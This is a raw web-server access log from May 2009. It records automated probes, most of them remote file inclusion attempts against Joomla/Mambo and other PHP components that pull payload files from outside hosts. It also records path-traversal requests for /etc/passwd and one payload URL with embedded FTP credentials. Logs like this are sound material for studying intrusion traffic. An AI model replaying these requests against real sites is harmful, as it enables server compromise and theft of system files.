124.0.54.98 - - [08/May/2009:02:29:45 -0400] "GET /logs/access_log.Q108103000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
110.45.146.146 - - [08/May/2009:02:29:48 -0400] "GET /logs/access_log.Q108083100//modules/vwar/admin/admin.php?vwar_root=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
209.59.12.99 - - [08/May/2009:02:29:56 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.72.114 - - [08/May/2009:02:29:56 -0400] "GET /logs/access_log.Q109021800 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
195.20.225.45 - - [08/May/2009:02:30:19 -0400] "GET /logs/error_log.Q108100400//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
69.89.31.105 - - [08/May/2009:02:30:23 -0400] "GET /logs/access_log.Q108081200//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 267 "-" "libwww-perl/5.812"
69.89.31.105 - - [08/May/2009:02:30:23 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.812"
69.89.31.105 - - [08/May/2009:02:30:23 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.812"
60.199.213.88 - - [08/May/2009:02:30:37 -0400] "GET /errors.php?error=http://212.227.74.68/catalog/test.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
59.109.75.80 - - [08/May/2009:02:30:37 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://212.227.74.68/catalog/test.txt? HTTP/1.0" 404 250 "-" "libwww-perl/5.803"
67.204.25.53 - - [08/May/2009:02:30:50 -0400] "GET /logs/access_log.Q108081200//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 267 "-" "libwww-perl/5.803"
67.204.25.53 - - [08/May/2009:02:30:50 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.803"
67.204.25.53 - - [08/May/2009:02:30:50 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.803"
88.84.128.40 - - [08/May/2009:02:30:53 -0400] "GET /logs/access_log.Q108081200//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 267 "-" "libwww-perl/5.803"
88.84.128.40 - - [08/May/2009:02:30:53 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.803"
88.84.128.40 - - [08/May/2009:02:30:53 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.803"
59.109.75.80 - - [08/May/2009:02:31:32 -0400] "GET /logs/access_log.Q109042600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://212.227.74.68/catalog/test.txt? HTTP/1.0" 404 277 "-" "libwww-perl/5.803"
211.115.213.66 - - [08/May/2009:02:31:50 -0400] "GET /logs/access_log.Q108110900//modules/TotalCalendar/about.php?inc_dir=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 257 "-" "libwww-perl/5.79"
116.121.201.70 - - [08/May/2009:02:31:53 -0400] "GET /logs/access_log.Q108112400//?_zb_path=http://ssdnb.net/bbs/vo.txt? HTTP/1.1" 404 226 "-" "libwww-perl/5.65"
222.236.44.32 - - [08/May/2009:02:32:04 -0400] "GET /index2.php?x=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
222.236.44.32 - - [08/May/2009:02:32:04 -0400] "GET /logs/index2.php?x=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
222.236.44.32 - - [08/May/2009:02:32:04 -0400] "GET /logs/error_log.Q108070400/index2.php?x=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
222.236.44.32 - - [08/May/2009:02:32:04 -0400] "GET /logs/error_log.Q108052800/index2.php?x=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
222.236.44.32 - - [08/May/2009:02:32:23 -0400] "GET /logs/error_log.Q108052800/index2.php?x=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
222.236.44.32 - - [08/May/2009:02:32:23 -0400] "GET /logs/error_log.Q108070400/index2.php?x=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
222.236.44.32 - - [08/May/2009:02:32:23 -0400] "GET /logs/index2.php?x=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
222.236.44.32 - - [08/May/2009:02:32:27 -0400] "GET /index2.php?x=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
66.197.202.64 - - [08/May/2009:02:33:07 -0400] "GET //administrators/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
66.197.202.64 - - [08/May/2009:02:33:07 -0400] "GET /logs/access_log.Q109042600%20%20//administrators/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
66.197.202.64 - - [08/May/2009:02:33:07 -0400] "GET /logs//administrators/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
110.45.146.146 - - [08/May/2009:02:33:22 -0400] "GET /logs/access_log.Q108072200/send_reminders.php?includedir=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
124.0.54.98 - - [08/May/2009:02:33:32 -0400] "GET /logs/access_log.Q108082100%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
74.6.8.112 - - [08/May/2009:02:33:42 -0400] "GET /logs/error_log.Q109012800 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.106.253.45 - - [08/May/2009:02:34:11 -0400] "GET /logs///modules/errors.php?error=../../../../../../../../etc/passwd HTTP/1.0" 404 223 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
87.106.253.45 - - [08/May/2009:02:34:11 -0400] "GET /logs//modules/errors.php?error=http://www.rabika.ru/hk? HTTP/1.0" 404 222 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
59.109.75.86 - - [08/May/2009:02:34:47 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://212.227.74.68/catalog/test.txt? HTTP/1.0" 404 255 "-" "libwww-perl/5.803"
209.59.12.99 - - [08/May/2009:02:34:56 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.165.73.157 - - [08/May/2009:02:35:01 -0400] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
121.165.73.157 - - [08/May/2009:02:35:01 -0400] "GET /logs/access_log.Q108110900/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
121.165.73.157 - - [08/May/2009:02:35:01 -0400] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
121.165.73.157 - - [08/May/2009:02:35:01 -0400] "GET /logs/access_log.Q108110900/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
121.165.73.157 - - [08/May/2009:02:35:01 -0400] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
121.165.73.157 - - [08/May/2009:02:35:01 -0400] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
121.165.73.157 - - [08/May/2009:02:35:05 -0400] "GET /logs/access_log.Q108091400/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
121.165.73.157 - - [08/May/2009:02:35:06 -0400] "GET /logs/access_log.Q108091400/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
124.0.54.98 - - [08/May/2009:02:35:13 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
124.0.54.98 - - [08/May/2009:02:35:14 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
110.45.146.146 - - [08/May/2009:02:35:22 -0400] "GET /index.php?go=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
110.45.146.146 - - [08/May/2009:02:35:22 -0400] "GET /logs/index.php?go=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
110.45.146.146 - - [08/May/2009:02:35:24 -0400] "GET /logs/access_log.Q108090400/index.php?go=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
121.165.73.157 - - [08/May/2009:02:35:24 -0400] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
121.165.73.157 - - [08/May/2009:02:35:24 -0400] "GET /logs/access_log.Q108110900%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
121.165.73.157 - - [08/May/2009:02:35:24 -0400] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
121.165.73.157 - - [08/May/2009:02:35:24 -0400] "GET /logs/access_log.Q108110900%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
121.165.73.157 - - [08/May/2009:02:35:24 -0400] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
121.165.73.157 - - [08/May/2009:02:35:24 -0400] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
121.165.73.157 - - [08/May/2009:02:35:28 -0400] "GET /logs/access_log.Q108091400%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
121.165.73.157 - - [08/May/2009:02:35:29 -0400] "GET /logs/access_log.Q108091400%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
75.125.245.26 - - [08/May/2009:02:35:47 -0400] "GET /logs//?_zb_path=http://www.politicalroundtable.com/plugins/pl.gif??? HTTP/1.1" 200 485 "-" "libwww-perl/5.805"
75.125.245.26 - - [08/May/2009:02:35:47 -0400] "GET /logs/access_log.Q108100900//?_zb_path=http://www.politicalroundtable.com/plugins/pl.gif??? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
75.125.245.26 - - [08/May/2009:02:35:47 -0400] "GET //?_zb_path=http://www.politicalroundtable.com/plugins/pl.gif??? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
93.158.145.28 - - [08/May/2009:02:35:59 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Yandex/1.01.001 (compatible; Win16; I)"
69.89.31.105 - - [08/May/2009:02:36:00 -0400] "GET /logs/access_log.Q108110300//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 267 "-" "libwww-perl/5.812"
122.116.178.20 - - [08/May/2009:02:36:01 -0400] "GET /logs//administrators/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
122.116.178.20 - - [08/May/2009:02:36:01 -0400] "GET /logs/access_log.Q109042600%20%20//administrators/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
122.116.178.20 - - [08/May/2009:02:36:01 -0400] "GET //administrators/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
93.158.145.28 - - [08/May/2009:02:36:02 -0400] "GET / HTTP/1.1" 200 409 "-" "Yandex/1.01.001 (compatible; Win16; I)"
67.204.25.53 - - [08/May/2009:02:36:06 -0400] "GET /logs/access_log.Q108110300//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 267 "-" "libwww-perl/5.803"
67.227.186.29 - - [08/May/2009:02:36:21 -0400] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://jianshenonline.com/mail/mail/FX29ID1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
67.227.186.29 - - [08/May/2009:02:36:21 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://jianshenonline.com/mail/mail/FX29ID1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
67.227.186.29 - - [08/May/2009:02:36:21 -0400] "GET /logs/access_log.Q108100900%20%20//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://jianshenonline.com/mail/mail/FX29ID1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
124.0.54.98 - - [08/May/2009:02:36:29 -0400] "GET /logs/access_log.Q108091400%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
122.116.178.20 - - [08/May/2009:02:36:31 -0400] "GET //administrators/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
122.116.178.20 - - [08/May/2009:02:36:31 -0400] "GET /logs//administrators/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
67.227.186.29 - - [08/May/2009:02:36:31 -0400] "GET /logs/access_log.Q108103100%20%20//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://jianshenonline.com/mail/mail/FX29ID1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
122.116.178.20 - - [08/May/2009:02:36:31 -0400] "GET /logs/access_log.Q109042600%20%20//administrators/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
124.0.54.98 - - [08/May/2009:02:36:35 -0400] "GET /logs/access_log.Q108103000%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
88.84.128.40 - - [08/May/2009:02:37:00 -0400] "GET /logs/access_log.Q108110300//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 267 "-" "libwww-perl/5.803"
66.11.230.36 - - [08/May/2009:02:37:06 -0400] "GET /logs/download.php?sub=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
66.11.230.36 - - [08/May/2009:02:37:06 -0400] "GET /logs/access_log.Q108060200/download.php?sub=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.11.230.36 - - [08/May/2009:02:37:06 -0400] "GET /download.php?sub=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
66.11.230.36 - - [08/May/2009:02:37:08 -0400] "GET /logs/download.php?sub=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
66.11.230.36 - - [08/May/2009:02:37:08 -0400] "GET /logs/access_log.Q108060200%20%20/download.php?sub=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
66.11.230.36 - - [08/May/2009:02:37:08 -0400] "GET /download.php?sub=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
66.11.230.36 - - [08/May/2009:02:37:10 -0400] "GET /download.php?sub=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
66.11.230.36 - - [08/May/2009:02:37:10 -0400] "GET /logs/access_log.Q108060200/download.php?sub=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.11.230.36 - - [08/May/2009:02:37:10 -0400] "GET /logs/download.php?sub=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
66.11.230.36 - - [08/May/2009:02:37:11 -0400] "GET /download.php?sub=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
66.11.230.36 - - [08/May/2009:02:37:11 -0400] "GET /logs/access_log.Q108060200/download.php?sub=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.11.230.36 - - [08/May/2009:02:37:11 -0400] "GET /logs/download.php?sub=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
66.11.230.36 - - [08/May/2009:02:37:14 -0400] "GET /logs/access_log.Q108060800%20%20/download.php?sub=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
66.11.230.36 - - [08/May/2009:02:37:16 -0400] "GET /logs/access_log.Q108081700/download.php?sub=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.11.230.36 - - [08/May/2009:02:37:17 -0400] "GET /logs/access_log.Q108060800/download.php?sub=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.11.230.36 - - [08/May/2009:02:37:28 -0400] "GET /logs/error_log.Q108061400/download.php?sub=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
66.11.230.36 - - [08/May/2009:02:37:28 -0400] "GET /download.php?sub=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
66.11.230.36 - - [08/May/2009:02:37:28 -0400] "GET /logs/download.php?sub=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
124.0.54.98 - - [08/May/2009:02:37:43 -0400] "GET /logs/access_log.Q108100100///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
81.176.226.180 - - [08/May/2009:02:38:39 -0400] "GET /logs/access_log.Q108090400/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.hajobakker.com/portfolio/idoisir.txt??? HTTP/1.1" 404 271 "-" "libwww-perl/5.805"
81.176.226.180 - - [08/May/2009:02:38:40 -0400] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.hajobakker.com/portfolio/idoisir.txt??? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
81.176.226.180 - - [08/May/2009:02:38:40 -0400] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.hajobakker.com/portfolio/idoisir.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
121.165.73.157 - - [08/May/2009:02:38:46 -0400] "GET /logs/access_log.Q108090400/admin/editeur/spaw_control.class.php?spaw_root=http://hicham.waray.free.fr/eva/fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
121.165.73.157 - - [08/May/2009:02:38:46 -0400] "GET /logs/access_log.Q109012400/admin/editeur/spaw_control.class.php?spaw_root=http://hicham.waray.free.fr/eva/fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
81.176.226.180 - - [08/May/2009:02:39:18 -0400] "GET /logs/access_log.Q108090900/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.hajobakker.com/portfolio/idoisir.txt??? HTTP/1.1" 404 271 "-" "libwww-perl/5.805"
85.214.20.7 - - [08/May/2009:02:39:47 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
85.214.20.7 - - [08/May/2009:02:39:49 -0400] "GET /logs/access_log.Q109042600%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
85.214.20.7 - - [08/May/2009:02:39:49 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
86.54.102.45 - - [08/May/2009:02:40:16 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
86.54.102.45 - - [08/May/2009:02:40:16 -0400] "GET /logs/access_log.Q109040300%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
86.54.102.45 - - [08/May/2009:02:40:16 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
86.54.102.45 - - [08/May/2009:02:40:28 -0400] "GET /logs/access_log.Q109040400%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
62.116.168.108 - - [08/May/2009:02:40:32 -0400] "GET /logs/access_log.Q109042600//administrators/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
62.116.168.108 - - [08/May/2009:02:40:32 -0400] "GET //administrators/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
62.116.168.108 - - [08/May/2009:02:40:32 -0400] "GET /logs//administrators/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
66.11.230.36 - - [08/May/2009:02:40:38 -0400] "GET /download.php?sub=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
66.11.230.36 - - [08/May/2009:02:40:40 -0400] "GET /logs/download.php?sub=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
66.11.230.36 - - [08/May/2009:02:40:40 -0400] "GET /logs/access_log.Q108060200/download.php?sub=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.11.230.36 - - [08/May/2009:02:40:44 -0400] "GET /logs/access_log.Q108081700/download.php?sub=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
110.45.146.146 - - [08/May/2009:02:41:11 -0400] "GET /logs/access_log.Q108052400//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
195.20.225.45 - - [08/May/2009:02:41:19 -0400] "GET /logs/access_log.Q108100400//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
195.20.225.45 - - [08/May/2009:02:41:19 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
195.20.225.45 - - [08/May/2009:02:41:20 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 221 "-" "libwww-perl/5.805"
110.45.146.146 - - [08/May/2009:02:41:22 -0400] "GET /logs/access_log.Q108101700//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
